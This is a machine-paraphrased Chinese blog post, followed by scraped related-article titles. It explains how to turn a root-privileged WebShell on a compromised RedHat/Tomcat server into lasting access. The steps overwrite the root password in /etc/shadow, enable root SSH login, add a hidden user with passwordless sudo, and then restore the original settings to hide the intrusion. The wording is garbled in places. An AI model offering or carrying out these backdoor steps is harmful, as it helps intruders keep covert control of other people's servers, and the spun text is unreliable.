没啥技术含量,一种思绪,让某些得到Root权限WebShell的同窗能够快点拿到权限。

某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat顺序是Root身份启动的,WebShell当然也拥有Root权限。

详细提权思绪:

1.WebShell直接替换Root密码:/etc/shadow    //记得备份

2.准许Root议决ssh登陆:

修正:/etc/ssh/sshd_config

PermitRootLogin yes   #准许Root登陆

3.重启ssh服务:service ssh restart

4.以Root身份登陆ssh,添加一个用户:

useradd application

passwd    //依据提示配置密码

5.修改application用户运转su不需密码:

chmod +w /etc/sudoers    //添加写入权限,默许只读

修正:/etc/sudoers

vi /etc/sudoers

参与:application   ALL=(ALL)        NOPASSWD: ALL

6.把Root密码修正回原样,制止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

7.当然开头还要:chmod -w /etc/sudoers

Root用户登陆。

普通用户登陆,su免密码进入Root权限。

宝塔linux webshell提权,linux提权 Root权限WebShell提权相关推荐

  1. java linux root权限管理_新的 Linux sudo 漏洞使本地用户获得 root 权限

    近日被技术专家所发现的新 sudo 漏洞允许任何本地用户在不需要任何身份验证的情况下就可以在类 Unix 操作系统上获得 root 权限. Sudo 实际上就是一个 Unix 程序,它使系统管理员可以 ...

  2. linux root权限_Linux 提权技术

    通过这篇文章,你讲了解到一下知识: 什么是提权? 为什么要提权? Linux 提权方法有哪些? 什么是提权? 一次完整的渗透测试流程,应该包含 主机发现 > 服务枚举 > 实施攻击 > ...

  3. linux sudo漏洞 可导致用户以 root 权限运行命令

    Linux 用户要注意了!几乎所有基于 UNIX 和 Linux 的操作系统上安装的核心命令,也是最重要.最强大也最常用的工具 Sudo中被曝存在一个漏洞. Sudo 的全称是"superu ...

  4. linux利用su -从普通用户切换root权限

    linux系统下, 普通用户输入su -可以切换root权限, 需要输入密码. 此操作可在某些特殊情况下无法登陆root可以登录普通用户的时候使用

  5. Redis未授权访问写Webshell和公私钥认证获取root权限

    0x01 什么是Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Red ...

  6. linux sudo永久免密码,linux 免密码 使用sudo 直接使用root权限执行命令

    1.切换到root用户下,怎么切换就不用说了吧,不会的本身百度去.百度 2.添加sudo文件的写权限,命令是:权限 chmod u+w /etc/sudoers密码 3.编辑sudoers文件文件 v ...

  7. linux添加用户或给用户添加root权限

    1.添加用户,首先用adduser命令添加一个普通用户,命令如下: #adduser tommy //添加一个名为tommy的用户 #passwd tommy //修改密码 Changing pass ...

  8. 暗藏 15 年,Linux 惊曝 3 大 Bug 直取 root 权限!

    Linux 又曝出一个 15 年的"陈年 Bug",Linux 真的安全吗? 整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) 操作系统界,素来流传着一种说法:Lin ...

  9. 手机安装linux不root权限管理,不root手机也能使用linux环境并安装msf等工具

    抵挡不住物理键盘的诱惑在key2首发的时候下手了.黑莓的天性,不能root.之前用nexus习惯用linux deploy搭建的kali环境需要root权限,所以虽然key2敲命令很爽,但是不能使用l ...

  10. linux etc passwd权限,替换linux系统文件etc下passwd文件的字段获取真正的root权限

    sudo与root 很多人都知道使用linux可以利用sudo来执行一些root权限执行的事情,但是sudo和root还是有很大的区别的. 区别一:sudo可以执行的命令是root账户利用/etc/s ...

最新文章

  1. 如何计算数据集均值和方差
  2. number类型的数组
  3. VTK:模型之Finance
  4. Cloud for Customer UI designer模型里编写的script运行时是如何执行的
  5. 思科设备snmp配置。
  6. .NET Core 微信小程序支付——(统一下单)
  7. 利用numpy生成各种波
  8. 阿里研究院:2020阿里农产品电商报告
  9. Ubuntu镜像源下载
  10. 【BZOJ5100】[POI2018]Plan metra 构造
  11. Springboot整合Drools规则引擎
  12. python批量创建txt文件
  13. 努比亚 N1 (Nubia NX541J) 解锁BootLoader 并刷入recovery
  14. 高中计算机上册知识总结怎么写,高中计算机总结范文
  15. Null(空值)和 Undefined(未定义)
  16. 一页中关村 · 当百度碰见丧尸
  17. golang反射的类型Type与种类Kind使用
  18. DataGear 制作Excel动态数据可视化图表
  19. 关于华硕笔记本BIOS设置
  20. 各种风格简洁单页响应式html5模板_简洁 响应式 单页 跳转 设计 案例 源码340多套订餐企业模板高大尚响应式网站模板html5网页静态模板Bootstrap扁平化网站源码css3手机seo自适响

热门文章

  1. 第04课:了解数据必备的文本可视化技巧
  2. 跑语义分割程序时报错
  3. android蓝牙传输文件到mysql_使用Android将图像发送到MySQL数据库
  4. aardio - 旋转图片
  5. 如何啃一本很晦涩的专业书
  6. mysql+xf01x,[613]redis数据迁移
  7. Codewars | 使用入门
  8. 2017南工软件ACM集训队选拔赛第一场
  9. php phalcon 安装,安装phalcon 开发工具
  10. 百分之九十的人都不清楚自己找的是Kanban软件还是看板软件(附Kanban工具测评)